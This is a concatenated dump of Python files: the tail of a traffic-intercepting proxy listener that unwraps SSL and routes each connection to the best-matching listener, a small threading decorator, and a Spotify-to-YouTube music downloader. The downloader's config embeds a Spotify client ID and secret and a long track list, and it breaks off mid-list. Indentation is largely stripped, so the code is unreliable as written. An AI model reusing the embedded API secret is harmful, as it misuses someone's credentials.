name='ProxyListener',
logging_level=logging.DEBUG,
):
self.logger = logging.getLogger(name)
self.logger.setLevel(logging_level)
self.config = config
self.name = name
self.local_ip = config.get('ipaddr')
self.server = None
self.udp_fwd_table = dict()
self.logger.debug('Starting...')
self.logger.debug('Initialized with config:')
for key, value in config.items():
self.logger.debug(' %10s: %s', key, value)
def start(self):
proto = self.config.get('protocol').upper()
if proto != None:
if proto == 'TCP':
self.logger.debug('Starting TCP ...')
self.server = ThreadedTCPServer((self.local_ip,
int(self.config.get('port'))), ThreadedTCPRequestHandler)
elif proto == 'UDP':
self.logger.debug('Starting UDP ...')
self.server = ThreadedUDPServer((self.local_ip,
int(self.config.get('port'))), ThreadedUDPRequestHandler)
self.server.fwd_table = self.udp_fwd_table
else:
self.logger.error('Unknown protocol %s' % proto)
return
else:
self.logger.error('Protocol is not defined')
return
self.server.config = self.config
self.server.logger = self.logger
self.server.local_ip = self.local_ip
if self.local_ip == '0.0.0.0':
self.server.local_ip = 'localhost'
self.server.running_listeners = None
self.server.diverter = None
self.server_thread = threading.Thread(
target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
server_ip, server_port = self.server.server_address
self.logger.debug("%s Server(%s:%d) thread: %s" % (proto, server_ip,
server_port, self.server_thread.name))
def stop(self):
self.logger.debug('Stopping...')
if self.server:
self.server.shutdown()
self.server.server_close()
def acceptListeners(self, listeners):
self.server.listeners = listeners
def acceptDiverter(self, diverter):
self.server.diverter = diverter
class ThreadedTCPClientSocket(threading.Thread):
def __init__(self, ip, port, listener_q, remote_q, config, log):
super(ThreadedTCPClientSocket, self).__init__()
self.ip = ip
self.port = int(port)
self.listener_q = listener_q
self.remote_q = remote_q
self.config = config
self.logger = log
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def run(self):
try:
self.sock.connect((self.ip, self.port))
while True:
readable, writable, exceptional = select.select([self.sock],
[], [], .001)
if not self.remote_q.empty():
data = self.remote_q.get()
self.sock.send(data)
if readable:
data = self.sock.recv(BUF_SZ)
if data:
self.listener_q.put(data)
else:
self.sock.close()
exit(1)
except Exception as e:
            self.logger.debug('Listener socket exception: %s' % e)
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
daemon_threads = True
class ThreadedUDPServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
daemon_threads = True
def get_top_listener(config, data, listeners, diverter, orig_src_ip,
orig_src_port, proto):
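    # Ask every listener to taste() the peeked data for the original destination port
    # and return the one reporting the highest confidence (or None if nothing matches).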
top_listener = None
top_confidence = 0
dport = diverter.getOriginalDestPort(orig_src_ip, orig_src_port, proto)
for listener in listeners:
try:
confidence = listener.taste(data, dport)
if confidence > top_confidence:
top_confidence = confidence
top_listener = listener
except:
# Exception occurs if taste() is not implemented for this listener
pass
return top_listener
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
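        # Peek at the client's first bytes, transparently unwrap SSL if detected, pick
        # the most likely listener, then relay data between the remote socket and it.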
remote_sock = self.request
# queue for data received from the listener
listener_q = queue.Queue()
# queue for data received from remote
remote_q = queue.Queue()
data = None
ssl_remote_sock = None
keyfile_path = 'listeners/ssl_utils/privkey.pem'
keyfile_path = ListenerBase.abs_config_path(keyfile_path)
if keyfile_path is None:
self.logger.error('Could not locate %s', keyfile_path)
sys.exit(1)
certfile_path = 'listeners/ssl_utils/server.pem'
certfile_path = ListenerBase.abs_config_path(certfile_path)
if certfile_path is None:
self.logger.error('Could not locate %s', certfile_path)
sys.exit(1)
ssl_version = ssl.PROTOCOL_SSLv23
try:
data = remote_sock.recv(BUF_SZ, socket.MSG_PEEK)
self.server.logger.debug('Received %d bytes.', len(data))
self.server.logger.debug('%s', '-'*80,)
for line in hexdump_table(data):
self.server.logger.debug(line)
self.server.logger.debug('%s', '-'*80,)
except Exception as e:
            self.server.logger.warning('recv() error: %s' % e)
if data:
if ssl_detector.looks_like_ssl(data):
self.server.logger.debug('SSL detected')
ssl_remote_sock = ssl.wrap_socket(
remote_sock,
server_side=True,
do_handshake_on_connect=True,
certfile=certfile_path,
ssl_version=ssl_version,
keyfile=keyfile_path )
data = ssl_remote_sock.recv(BUF_SZ)
orig_src_ip = self.client_address[0]
orig_src_port = self.client_address[1]
top_listener = get_top_listener(self.server.config, data,
self.server.listeners, self.server.diverter,
orig_src_ip, orig_src_port, 'TCP')
if top_listener:
self.server.logger.debug('Likely listener: %s' %
top_listener.name)
listener_sock = ThreadedTCPClientSocket(self.server.local_ip,
top_listener.port, listener_q, remote_q,
self.server.config, self.server.logger)
listener_sock.daemon = True
listener_sock.start()
remote_sock.setblocking(0)
# ssl has no 'peek' option, so we need to process the first
# packet that is already consumed from the socket
if ssl_remote_sock:
ssl_remote_sock.setblocking(0)
remote_q.put(data)
while True:
readable, writable, exceptional = select.select(
[remote_sock], [], [], .001)
if readable:
try:
if ssl_remote_sock:
data = ssl_remote_sock.recv(BUF_SZ)
else:
data = remote_sock.recv(BUF_SZ)
if data:
remote_q.put(data)
else:
self.server.logger.debug(
'Closing remote socket connection')
return
except Exception as e:
self.server.logger.debug('Remote Connection terminated')
return
if not listener_q.empty():
data = listener_q.get()
if ssl_remote_sock:
ssl_remote_sock.send(data)
else:
remote_sock.send(data)
class ThreadedUDPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
data = self.request[0]
remote_sock = self.request[1]
self.server.logger.debug('Received UDP packet from %s.' %
self.client_address[0])
if data:
self.server.logger.debug('Received %d bytes.', len(data))
self.server.logger.debug('%s', '-'*80,)
for line in hexdump_table(data):
self.server.logger.debug(line)
self.server.logger.debug('%s', '-'*80,)
orig_src_ip = self.client_address[0]
orig_src_port = self.client_address[1]
top_listener = get_top_listener(self.server.config, data,
self.server.listeners, self.server.diverter,
orig_src_ip, orig_src_port, 'UDP')
if top_listener:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((self.server.local_ip, 0))
sock.sendto(data, (self.server.local_ip, int(top_listener.port)))
reply = sock.recv(BUF_SZ)
self.server.logger.debug('Received %d bytes.', len(data))
sock.close()
remote_sock.sendto(reply, (orig_src_ip, int(orig_src_port)))
else:
self.server.logger.debug('No packet data')
def hexdump_table(data, length=16):
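    # Render binary data as a hex dump: offset, hex bytes, and printable ASCII per row.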
hexdump_lines = []
    for i in range(0, len(data), length):
        chunk = data[i:i+length]
        hex_line = ' '.join(["%02X" % b for b in chunk])
        ascii_line = ''.join([chr(b) if 31 < b < 127 else '.' for b in chunk])
        hexdump_lines.append("%04X: %-*s %s" % (i, length*3, hex_line, ascii_line))
return hexdump_lines
def main():
logging.basicConfig(format='%(asctime)s [%(name)15s] %(message)s',
                        datefmt='%m/%d/%y %I:%M:%S %p', level=logging.DEBUG)
    logger = logging.getLogger('ProxyListener')
    global listeners
    listeners = load_plugins()
TCP_server = ThreadedTCPServer((sys.argv[1], int(sys.argv[2])),
ThreadedTCPRequestHandler)
TCP_server_thread = threading.Thread(target=TCP_server.serve_forever)
TCP_server_thread.daemon = True
TCP_server_thread.start()
tcp_server_ip, tcp_server_port = TCP_server.server_address
logger.debug("TCP Server(%s:%d) thread: %s" % (tcp_server_ip,
tcp_server_port, TCP_server_thread.name))
try:
while True:
time.sleep(.001)
except Exception as e:
logger.info(e)
TCP_server.shutdown()
finally:
logger.debug('Closing ProxyListener')
exit(1)
logger.debug('Exiting')
TCP_server.shutdown()
if __name__ == '__main__':
main()
|
tools.py
|
import threading
def concurrent(func):
'''
For functions that end but need to run concurrently
:param func:
:return:
'''
def decorator(*args, **kwargs):
thread = threading.Thread(target=func, args=args, kwargs=kwargs)
thread.start()
return decorator
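# Illustrative usage sketch (the function below is hypothetical):
#
#   @concurrent
#   def send_notification(user_id):
#       ...  # long-running work happens in its own thread
#
#   send_notification(42)  # returns immediately; the call itself returns None
#
# Note: the decorator does not expose the Thread object and the thread is not a daemon,
# so the interpreter will wait for it to finish before exiting.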
|
copycat.py
|
import argparse
import json
import os
import shutil
import sys
import threading
import time
import urllib
import urllib.request
import eyed3
import requests
import spotipy
import youtube_dl
from bs4 import BeautifulSoup
from spotipy.oauth2 import SpotifyClientCredentials
configs = {
'threads': 12, # use this many downloads at once! super duper fast! consumes CPU like its cake!
'concurrent_connections': 2, # threaded spotify connections,
'download_dir': 'C:/Project/copycat/music/', # Downloaded songs go here.
'sync_download_dir': [ # Sync the downloaded songs with these directories
'G:/MUSIC/spotify/',
],
'song_selection': {
'use_filtering': False,
'edge_cases': ['remix', 'live', 'instrumental', 'cover', 'how to', 'tutorial', 'concert',
'reimagined', 'bass boost', 'boosted', 'explained', 'slowed', 'karaoke',
'datamosh', 'show', '3d', 'dance', 'unplugged', 'behind', 'festival',
'chipmunks', 'preview', 'mashup', 'feat', 'bass', 'acoustic', 'session',
' vs ', 'sings', 'grammy', 'parody', 'decoded', 'lyrics',
'performance', '8d', 'chipmunks', 'bass boosted', 'clean'],
# ignore songs that contain these words,
        'min_percent_threshold': 60,  # if a song title is more than 5 words, check what percentage of it matches
        'diff_track_seconds_limit': 5,  # limit the duration comparison to the top 2 songs
'append_search_term': '', # append some terms for search
},
    'youtube_username': None,  # Can't download? Try this
'youtube_password': None, # 🙈
'tag_mp3': True, # sure, why would you not?
'spotify': { # you know what
'client_id': 'ea59966691f546a38c800e765338cf31',
'client_secret': 'a99b13c2324340939cca0a6d71f91bc3'
},
'playlist': {
'spotify_parsed': [], # for internal use, dont worry
'spotify': [
[
'https://open.spotify.com/track/4yrloqLBKS7Pi3z7g2HDga?si=SFhC5k1qTLuf1ByrBlKWCA',
'https://open.spotify.com/track/5EzGOkUwkRUXYAyvjlEHah?si=iJF3_Y-zQkKAhOLkhU6ScQ',
'https://open.spotify.com/track/5rfNNdaCovygh3cxY1txTR?si=oIEDqPtERny1y0uAekcpVA',
'https://open.spotify.com/track/4qRHWM6lESs5vqNmTJrhum?si=86y-wkA8QlyMi_dz1KMIrw',
'https://open.spotify.com/track/56nziqLKNZ3METexiH6zdF?si=Dwak3g3HQNm1twoPkS-VGw',
'https://open.spotify.com/track/0mXu9RFixtjgppxSvcYcYI?si=gO2c-7gpQNm3Ny_AYfnhoQ',
'https://open.spotify.com/track/5j3iBuHq6vv7VcBo4Y2QrK?si=L1-hZJsMQBe0c2MN3MSOIA',
'https://open.spotify.com/track/40mphbjHvSisMvIAmSfpBX?si=toJPcffsSLmfG5llqbIxgw',
'https://open.spotify.com/track/5MjMvRHjOOIV6tA7OmC7mj?si=o7NtShzHRCWYoUMhMqNP4A',
'https://open.spotify.com/track/4IiZlgVMQMM7yTVsgoF4n5?si=KZC_Cuk-Qoeg6NjHd5RXmw',
'https://open.spotify.com/track/4U45aEWtQhrm8A5mxPaFZ7?si=LLmwJrYFRcuTR1w5zi_NpQ',
'https://open.spotify.com/track/1bp2IO61zbQrbWNmKKxg3f?si=ItylzUeqTmC7NtFTsZyDtw',
'https://open.spotify.com/track/1ne9wOtDF2jM6Cm8WBkaER?si=MEINsA2tTji4D73x1VYN9Q',
'https://open.spotify.com/track/4NuYhskP3cjbKPKIzjs4ui?si=q8nGZmahSzGAoBBaMrBPWA',
'https://open.spotify.com/track/37uGIrP6noERm2i7ECtMA7?si=IYBRlDyTRNKka22N7XFzNA',
'https://open.spotify.com/track/539y2n1UYiM2gyYJKGNuuQ?si=m7dUZujhTEa-YscBsLGPRg',
'https://open.spotify.com/track/3PZ0RoABbjIZhqvfFizOqa?si=BETn8jfjSF-dOWDTyDhs6A',
'https://open.spotify.com/track/5Sl4KG5rsxTN5AIvSyz5rG?si=Duhm3g9cROifEeqxV8I02w',
'https://open.spotify.com/track/26pC4BgyjdRIeieIcGqLcw?si=h5vDmkVLSDyv6Vv3A96tLQ',
'https://open.spotify.com/track/7bliRZuMFa2JmUzzNd62kk?context=spotify%3Auser%3A1230996273%3Aplaylist%3A2zsz3v4L5Y1bYrSAToUux9&si=EAHXvBu9SMmoxX5t9K_wiA',
'https://open.spotify.com/track/6w53UWYxXvQv5nU7GdNz1w?si=bbvVVdSVQLS8l-FJ3acuBQ',
'https://open.spotify.com/track/4xa0M48GDJvxClxR1t6fTf?si=QWc71ACGSqCC-LlecAMtCA',
'https://open.spotify.com/track/715fRwy0DoOnPbV6EMgcXt?si=f4htmbbBTMuQuZxz5cLoLQ',
'https://open.spotify.com/track/3jNGLTOcA4a34rZD2y392C?si=oe1jihXGQnCodM9JfKTjOA',
'https://open.spotify.com/track/3lWzVNe1yFZlkeBBzUuZYu?si=OWl1t2DLS0qTvl_Bmp1kPw',
'https://open.spotify.com/track/3bH4HzoZZFq8UpZmI2AMgV?si=ljBJWmP5Stu3mIzpfjQqrA',
'https://open.spotify.com/track/1oHLqcJbc9B7tVWlyCxq08?si=x6-9W8VrRoaNcIUWyu1R3A',
'https://open.spotify.com/track/1kLXoAje5Z4mlZOAFgZZj3?si=H2U9GP5fR6Wvy2PwSPWFKg',
'https://open.spotify.com/track/5A0sUMilD9HyM3UvMWk3zA?si=eUuvTplaQZuNvRqyn_PvEw',
'https://open.spotify.com/track/13cUO19nAPFVL1KwAsp1uK?si=YxUMcHfRRWapXC67g0drng',
'https://open.spotify.com/track/1Po2cMkzVblh10Lg3GimtJ?si=v1rbcrGRR5m_Xd8o4D1FQw',
'https://open.spotify.com/track/5QrUUrMhPi8eLKLPKEI89v?si=4PJd3WVuTgeuKvy26g9GDA',
'https://open.spotify.com/track/6nNWB2fwEbJHy7y587GV2M?si=S38KucqlQxaN2jB6Ib3nww',
'https://open.spotify.com/track/5X0kkx0LFKtRyXYPSRjdc8?si=3n9Nk7jaT_G9vrqicrsXBQ',
'https://open.spotify.com/track/5wakd1HmmslRhTcQMee8Mw?si=cpolWeUJRB-U0semhd0EIA',
'https://open.spotify.com/track/0uWHS4k3dA4w5PQszKaZOp?si=eXhTKDeFS9-mymvOmQue5Q',
'https://open.spotify.com/track/7mSmt2yar5VUXZNBV4AnpE?si=7lxcWkc0Q7iGD3ded_jLzA',
'https://open.spotify.com/track/2Qpt0DpnjmpoTAWoiHf5d8?si=0hXbXlPwSCmO72mEh201-A',
'https://open.spotify.com/track/5kgMPM2m2sGGuVL4KpHwiO?si=zSfkpL5cReGuVSdSrnfCZg',
'https://open.spotify.com/track/69L4d5HlE0YOCwWFYVFGoW?si=6JGrijMDRtaJSOFZX2L89w',
'https://open.spotify.com/track/11bD1JtSjlIgKgZG2134DZ?si=c-QGEeiVSJ6okb0YuqSNXw',
'https://open.spotify.com/track/4iaGeV4WFvP2ynbqCIyTpS?si=q3kz2QI2RTC03hJTO18kig',
'https://open.spotify.com/track/257SoE95qEweGItCB9Q5rE?si=DzVamVAPRh2AnPDpGuJmNg',
'https://open.spotify.com/track/40RaUosMp8ROAFVeqrKZGw?si=5eCFlK_kTPuxeoNIkteUYA',
'https://open.spotify.com/track/60CFGgbdZ315nIOuK5nYmM?si=LkkpSf6DQlGJKTsYfZtrBA',
'https://open.spotify.com/track/6jj5kO7tFT3ir8WbbVO0iU?si=Wnxifhg1R2Go6jc-SvMw7A',
'https://open.spotify.com/track/1rCPg5GOtes0FIo1BzgvUi?si=VjKsbeSZSCOLi0v9qaUiww',
'https://open.spotify.com/track/57iDDD9N9tTWe75x6qhStw?si=3DKN0LzOS8-wfBBXm-uHdQ',
'https://open.spotify.com/track/4iaGeV4WFvP2ynbqCIyTpS?si=W1Uq31ZzSk2deHGWgfzyhw',
'https://open.spotify.com/track/0DbmsqP6basyejOSSh6MKP?si=SWW8mb9NRc6sAdEUygNm_A',
'https://open.spotify.com/track/5fFqxdgVb6XRHN8VEoKh6I?si=_UDsJkpTSyyrPX6ANvkExw',
'https://open.spotify.com/track/2lW2hWO7Xw1ADSUp50w9b5?si=ywSfe46aSkKLA6LNvzXzGQ',
'https://open.spotify.com/track/16enJgtKy9yKQ9GEvzKBPI?si=qY-2TFCYTJCcGTpOUYO3YA',
'https://open.spotify.com/track/3uIOxWVRZI2XaqHDXfDc9b?si=ljXcGCClQP66iID7ntuDIA',
'https://open.spotify.com/track/71VqCMlnkqH1TYnRUk6IHG?si=S_GtRTNMQoahWBN9oRseDQ',
'https://open.spotify.com/track/5u7s3ny0Qbzie63WMB3q2V?si=Po_1eopqQgewJhKgN0ceFw',
'https://open.spotify.com/track/2k7aEpSZsvRSxif0JVPEaO?si=hfIDqD9cRfeM0gWP8aCscQ',
'https://open.spotify.com/track/7EvKZAZ5Jnl8TxSuFrkEEZ?si=z4kha6OoQSGtBgbwhoIPew',
'https://open.spotify.com/track/0YXCJlidjXsr7vnu7EXZtH?si=CiEjw4_CQPGQfneMEUCiSQ',
'https://open.spotify.com/track/7oiMyI6ilKfrt01Q6aZdPl?si=IyBBj1MGTQKFyie5__cZ0Q',
'https://open.spotify.com/track/504NLPDUBRylbZUUQR97XX?si=rp63v-NEQYGhoySbZexxTg',
'https://open.spotify.com/track/54GVTQmVYDOEl0DclsMrz8?si=XHijIpx8QlSFpJCwYoLNTw',
'https://open.spotify.com/track/5GcjIiSS47T64N1DFxn1UK?si=f0iWJPV4TKCSxaxeQ_PQLg',
'https://open.spotify.com/track/2PyAVQqdVKGYr6ZFuODNLJ?si=LciD5SB9QFqciQwAKmeHmg',
'https://open.spotify.com/track/44zGAo63hhc3xo0rlBweRo?si=C48Thm8LQQG1gZ3Ca1koGA',
'https://open.spotify.com/track/2Z1HknKRrvUv5cheidF8Ag?si=l47dTfe7Rzyrb5HXSbjVqw',
'https://open.spotify.com/track/2lW2hWO7Xw1ADSUp50w9b5?si=T1YP19sbQzWqScYIOZDH6g',
'https://open.spotify.com/track/5Osd2BWeCNtA6EMLY0Dsil?si=sXF8RxFXQ-6BKBfsepIuuw',
'https://open.spotify.com/track/0Qr61NXlyAeQaADO5xn3rI?si=WjbL-3LKTNum_xTBmzOepg',
'https://open.spotify.com/track/7pKfPomDEeI4TPT6EOYjn9?si=y3GbETptSya3jaR9PfozDw',
'https://open.spotify.com/track/2k7aEpSZsvRSxif0JVPEaO?si=E60hg5xuSe-K7X66azKW2w',
'https://open.spotify.com/track/32aYOuHE2oj9v5JdujsOJ2?si=umbvwJ0CR4eZiGrSvnJ5EQ',
'https://open.spotify.com/track/4e7qQOpigHBpRddCRB2BMi?si=gw3A9JeRTpCDr1ghY1Ho-w',
'https://open.spotify.com/track/4ArKqELzF9JJ9ASW7MmqsO?si=Aho1508xQhuQzv4g-eOgHg',
'https://open.spotify.com/track/62crJjeje0T8g5N3Tuq00V?si=WwwO5_H6QdqzjEkwvExEYQ',
'https://open.spotify.com/track/6HuMrMrfhhVADQ67VMx61l?si=Y-_ElTW4SAWKWU5FRqZbyQ',
'https://open.spotify.com/track/3rEUOhRcwfZEUVVSZjFiyG?si=Xgj0CH1WRz6K4phynP_kXA',
'https://open.spotify.com/track/7fN3QQtmCMkiczQ41IuhwK?si=bTiGwFk8QEWNKe1KEiiVsg',
'https://open.spotify.com/track/3YB9cvd668HXBEq8rbBW8P?si=8RYSR8nYSJ2kiwBpDQc-zA',
'https://open.spotify.com/track/5OuJTtNve7FxUX82eEBupN?si=kJkUNGd7S-2nKy_XlBjp5g',
'https://open.spotify.com/track/0hNhlwnzMLzZSlKGDCuHOo?si=0dzAf0Y6Q-qK-QxZ-wLEtA',
'https://open.spotify.com/track/3p3O6XnkYZit3cECcvZyDe?si=whbYuUT_Ql67aTef8FkvLA',
'https://open.spotify.com/track/4uAKeohK80UPEv8FWDTxvF?si=3Nm8W-UeSNa4s2neP25SPQ',
'https://open.spotify.com/track/4QjDEMmKqBIbMCBETddJ3x?si=tlIZ6YSdQnizihHni41CPA',
'https://open.spotify.com/track/3Rtv6zRNKpeSygXoaF9kCm?si=gLF76qSoTuyPKaXUjLrlyg',
'https://open.spotify.com/track/5j3iBuHq6vv7VcBo4Y2QrK?si=_XBhWfrSRjWsAkUKwQidhA',
'https://open.spotify.com/track/22kfxo7JTeqXbmjql43TIi?si=WBGn7jnbSpK-pODWrQ4rmw',
'https://open.spotify.com/track/3PMQvsVUEOMWsEGsSGG0aA?si=0fnI-RG1SESVLSXYSgREHQ',
'https://open.spotify.com/track/7u8MwUwM8oy3101vFMBMmp?si=Kzl54xq5R-yscJgDgzfH_g',
'https://open.spotify.com/track/0iTpQYzJnYgh7kIxyq8A2O?si=5QHd4maGTGqNww24m4xVRw',
'https://open.spotify.com/track/4KJHTdyIUdhKEuZdV3UuWR?si=sCaQohICRieE3l_9JQ_bIg',
'https://open.spotify.com/track/6yw8KDkUJ468SsbKPlF1vA?si=POZRWiIzR2mH-XVjxN_EKg',
'https://open.spotify.com/track/2lZHCWCUkxLuQ5skJhkoyS?si=PPPiaVvARW66w8_NoN2BUQ',
'https://open.spotify.com/track/7rLq1Mdn1K50CiUAbCrwtI?si=tyAeEbDkSRq_gMDu-KXyXg',
'https://open.spotify.com/track/1UmQrjcdTlI9pxT1gzU1Xa?si=R3bfmMw6QM2QBMI9diEGvQ',
'https://open.spotify.com/track/7CcaktZZsdb8AWPdhDM38f?si=o4BXkTH6Q-iPdfKXZl-EAg',
'https://open.spotify.com/track/75sAWnVBYaaYs1mWbB05Qg?si=12pcNFo4S9iKUbbEZzDfyw',
'https://open.spotify.com/track/23qCHcGBR7VKLfUwq1r9iu?si=oxpDsE7AS2-DvH2vKWpxGA',
'https://open.spotify.com/track/4tHqQMWSqmL6YjXwsqthDI?si=d54vHZlUTvy1tER3fOViPw',
'https://open.spotify.com/track/6b0icYIM8HEaPvadDB3DEc?si=ARGjSH-dT9GDiJhC92g2Lg',
'https://open.spotify.com/track/52ojopYMUzeNcudsoz7O9D?si=yIFAXRMlQFm5CBkFINCNNw',
'https://open.spotify.com/track/5jEiI1kg97yFHpiGERSGJ3?si=8_EbrKZFSg6CKDhPO54GRg',
'https://open.spotify.com/track/2BVUOGciUUUqOPSLtHwLGp?si=D6aW0pu6QI2yHvAC-oaewA',
'https://open.spotify.com/track/6tXYVzmdR7l7yEXY11b2Hq?si=tzK-7pV5RpqQHe8LRjO7Tw',
'https://open.spotify.com/track/5La0oCt8N3LZwfssCGzuZG?si=_WYpkTTXRdK29CDlOKy4Ow',
'https://open.spotify.com/track/37b1KAbfOZeBzeMB0LGO3g?si=abdqLw4KT2aubTfo7mQYvQ',
'https://open.spotify.com/track/3AHqaOkEFKZ6zEHdiplIv7?si=uPyiVtU0ShCb4N4GbJ_39w',
'https://open.spotify.com/track/1qqg36GouAEweWsSDfTgTW?si=n9AhibEwT3iM_uO_qtoc3A',
'https://open.spotify.com/track/0JWWEdHFYjUJcCtSWmF3P9?si=26APvhQDTEKqPSEO7TqpPg',
'https://open.spotify.com/track/669PEr8I3wOswY8BANBpdh?si=YMI1z_0LQLuuY60tp0FJTA',
'https://open.spotify.com/track/6xHlnkbGTtQaPvFJVIweaD?si=-yZjD-zXSVi6WsC0rp0diw',
'https://open.spotify.com/track/2viNxee3uNcVXrXvwAUVir?si=07B3YzS-RM-WZsze_m865g',
'https://open.spotify.com/track/4stm6lf1vQBSl7Eq4Npzr0?si=EGzzEKzPRj6fa5F_UOfQSQ',
'https://open.spotify.com/track/2jrc5wSJd4NYsewjDsoNEa?si=zet3JLurScy6gVk86Inx9A',
'https://open.spotify.com/track/4Sg5kugcA7G2dyFpok5Jyt?si=YIiTw1xiRX28kRByuhTZaw',
'https://open.spotify.com/track/2R7MOnecy9f8YrEsIJhpTf?si=SMlmlIcmRQODc7S7JxneXA',
'https://open.spotify.com/track/6N5WkgPIDoTdbCXyyIIKAv?si=8XEzbhu3QiaA0f5v8r9MCg',
'https://open.spotify.com/track/5T9G49pXWTV7SHMSksvfL4?si=EIjAiWBpRIK1M8rvF__19g',
'https://open.spotify.com/track/6tpZYMxcVhIjypOnk5eglk?si=Z7hxfe-oTq6iQFjiLCyL7g',
'https://open.spotify.com/track/5Q58RkKyUafm15Syxg79DW?si=U4ZNrekgRD-fMsxs6WWi7Q',
'https://open.spotify.com/track/7qEKqBCD2vE5vIBsrUitpD?si=xo4icAMASYW5DVSmHSPOUg',
'https://open.spotify.com/track/4K9xid96G3YmIvQZXN9SXg?si=dkxKKKJbS12GF4tAutTpRw',
'https://open.spotify.com/track/2FeYeAGexV851DsHdFsAmo?si=AlTgBcwuRga2AF2VEmNvLQ',
'https://open.spotify.com/track/3MYCrt08Tuc6vkBCh7CnRs?si=yWDYJqOiSKO2DraHMNV3MA',
'https://open.spotify.com/track/7qEKqBCD2vE5vIBsrUitpD?si=rSIFbazASSaHe0S8hJRj-Q',
'https://open.spotify.com/track/6HGDxEtcoUsztb2xeVOXTP?si=U3pPX81JQs6VDCRl-RPu_w',
'https://open.spotify.com/track/4PShfgy75bCYTWb6hNEMPe?si=k6jh3OhmRSuPa5CFI7RpoQ',
'https://open.spotify.com/track/3WyvZJGxtORVdtOkNyHBJp?si=DNwjewncTbiIVzigbfenKQ',
'https://open.spotify.com/track/0up9rhm9qt2LW7cnoDFCMk?si=uYg48Hx7QouD2H8rjYnEzw',
'https://open.spotify.com/track/2ASMRdulqfuFhYAIw1dOUM?si=vpuMPsiPTFWEj_7F5lKPUQ',
'https://open.spotify.com/track/5uFNJWnU1imR5jC5FuSLQM?si=jF9WdnePSIeR99E2GcQprQ',
'https://open.spotify.com/track/42wOySSV3mE3lSo12wKbmL?si=i3ZhE515S7KYMzesfYYkvQ',
'https://open.spotify.com/track/2PyAVQqdVKGYr6ZFuODNLJ?si=ARkYiC5YRIOTnHEtaHe7ww',
'https://open.spotify.com/track/4XzCEurXfdtL3mj4dU6le0?si=6Kqrc4QlRWOfdwzH0egLtQ',
'https://open.spotify.com/track/2MYPFXScWdR3PQihBQxu7x?context=spotify%3Aplaylist%3A37i9dQZF1DWZtZ8vUCzche&si=MsAm0sLXT4qtkivgJjHixA',
'https://open.spotify.com/track/0tZkVZ9DeAa0MNK2gY5NtV?si=vkIK3AcuS-6cjOyKOlzPVA',
'https://open.spotify.com/track/26pC4BgyjdRIeieIcGqLcw?si=TktI_BbUSOGjriXU0aAAYg',
'https://open.spotify.com/track/1ZZNQEptyOyGbJA9RU3Uvr?si=D0CWHAQCQsW5CmJqTeur6A',
'https://open.spotify.com/track/6c05B0BTOJbDyRy5KLI7my?si=o7AeaagPTvufy2lVZS3CRw',
'https://open.spotify.com/track/26eURhEKaQ7pKLtGW0jyF5?si=FdZ9ayAjTB6Sp_BRLe_pHg',
'https://open.spotify.com/track/01Zc2d1GLQ3SligNHtWeZr?si=G7NNf62iQ5uSrlQ6ReNL-g',
'https://open.spotify.com/track/3wSEuaaOZe8LBV35uRBwIo?si=njrJRqQ7SAKhZFqzJBseqw',
'https://open.spotify.com/track/1ZZNQEptyOyGbJA9RU3Uvr?si=kl63aQ2BRhGxswSYeFQBaA',
'https://open.spotify.com/track/3Q4arvJHKco7FdQTsdpC6e?si=GmCAUScqSgOVB5Xsy7JUgg',
'https://open.spotify.com/track/14f9BDKT2pvvSP5oK8qws3?si=XJqMifVeRTqD6mQ8pooBlg',
'https://open.spotify.com/track/22fOsxYglRTjZcTOG8859P?si=NdFqIPewROOkaFQcORPu8w',
'https://open.spotify.com/track/5PZYdz5eRfEPXrRyJgNKzX?si=Le5xKvdYSy2nRj5YFa0JvA',
'https://open.spotify.com/track/2FygRDP2PuxcvWGGyf3nao?si=Xktrr8eFRiqN8q20jRiO1w',
'https://open.spotify.com/track/5tRb0Y2bloJGI8uskuAtRL?si=ZH6xsR_cTnC1Bd9oOqpAaQ',
'https://open.spotify.com/track/1FPat9MxjcvQNvhuVuBcmQ?si=94fz9hekQ6y8d5UKDN-ACQ',
'https://open.spotify.com/track/1OzY7RRZh3EcIKn7VKZUTx?si=GveT2lx_TDuyWvsy1xPjCA',
'https://open.spotify.com/track/4A5FLaZI3Ni5eT0c9fqi8F?si=HpI991oXTwqUpKU_sde_zw',
'https://open.spotify.com/track/5lwwvBCUABdNcrIVYn6E15?si=PEjLMsNUTYar9rgcqIPyGw',
'https://open.spotify.com/track/6XmdsD2GKYGMiAqqrM0WON?si=z-a41oirRaOct6PRxKN7Bg',
'https://open.spotify.com/track/0q6LuUqGLUiCPP1cbdwFs3?si=c5gsJf2aTke1LbaNMwv42A',
'https://open.spotify.com/track/3pLTOP0G0etiWUknFoRpsr?si=Iev-qRERT5ibkKi3_v9MYQ',
'https://open.spotify.com/track/5KdhT7gtGHgE9uDKTppndY?si=ICNYCpBUR-SlR-MPC4NvNw',
'https://open.spotify.com/track/70l2FSI4z3iUnP7vDnG1Us?si=bQehlR67QkugAwCphPJQgg',
'https://open.spotify.com/track/7g3htkaLz4ETFn0cifwM3y?si=1OUwRfg2QbeV4fL-7m1z3g',
'https://open.spotify.com/track/5OuJTtNve7FxUX82eEBupN?si=Qvr8NJyQTaWHmNfyID_w6w',
'https://open.spotify.com/track/3B2cAYYUivsSuFGkFhnIGW?si=tmvKdtYITmSXsk3q5iJwWg',
'https://open.spotify.com/track/3YB9cvd668HXBEq8rbBW8P?si=8RYSR8nYSJ2kiwBpDQc-zA',
'https://open.spotify.com/track/4M5fqxO2LsqKA4AJqpduxv?si=MZmnvO6jSCqt0ogFCX0zXg',
'https://open.spotify.com/track/2cNjgoSh1TBHFQIhfzRJUE?si=lmNm-UKuTuOlAsiRw_xpFQ',
'https://open.spotify.com/track/1j0hMeC5fcnpwcsr3mH0pL?si=jN_yyPUhQkeJrFsOzvEwkA',
'https://open.spotify.com/track/7HcvxFfcST0Jhu2uQ2JVE9?si=vJ3VM4QaTaisFzxFuyAvAg',
'https://open.spotify.com/track/2Atzk0W2RHeZw2oIiaBubK?si=NyDLjIuMSGO50--7tSnzmw',
'https://open.spotify.com/track/6ZzItbgnMdQ0cKFy4lFV7A?si=5J6ewzn3TCCiXBC1CutOig',
